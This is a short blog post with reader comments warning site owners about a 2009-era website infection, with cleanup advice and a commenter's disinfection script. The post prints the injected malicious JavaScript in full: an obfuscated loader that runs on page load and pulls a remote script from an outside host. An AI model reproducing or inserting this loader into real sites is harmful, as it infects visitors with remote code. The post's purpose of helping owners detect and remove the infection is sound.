Site virus
Has your site been hacked?
Have you seen this at the bottom of your web page code?
bald chicken
/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement(‘script’);H3qqea3ur6p.setAttribute(‘type’, ‘text/javascript’);H3qqea3ur6p.setAttribute(‘id’, ‘myscript1′);H3qqea3ur6p.setAttribute(‘src’, ‘h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^’.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ”));H3qqea3ur6p.setAttribute(‘defer’, ‘defer’);document.body.appendChild(H3qqea3ur6p);}} catch(e) {}
This is caused by a virus that infects your computer commonly via bit torrent files downloaded that have a virus hidden in them.
Then this virus scans you computer for any FTP programs that you may have installed,
and steals the passwords for your FTP sites.
Then an automated program connects to your FTP site, and adds the above to any.
1) Html
2) java script filers
3) php files
4) possibly asp files
so they all need to be scanned for the following
I recommend using a program called Search and Replace http://www.funduc.com/search_replace.htm
this will fix all your programs in one hit.
The of course chage all your passwords of your FTP sites,
and get rid of the virus if you can find it
After Hours Doctors
I also faced with this virus and wrote a script for cleaning the infected files. You should just place it into the web root and make sure that the script has enough permissions for updating files. Please feel free to download the script at
http://justcoded.com/wp-content/uploads/2009/12/curevir.php.txt
Btw, you are not completely correct about virus behaviour. It doesn’t infect any PHP/HTML/ASP file, only specific files which contain words “index”, “default”, “main”, maybe something else
Well thanks for that
it certainly affects js files
so beware to remove it from them also
Yes, I just meant that not ALL of the PHP/HTML/ASP files are infected. JS files are infected completely though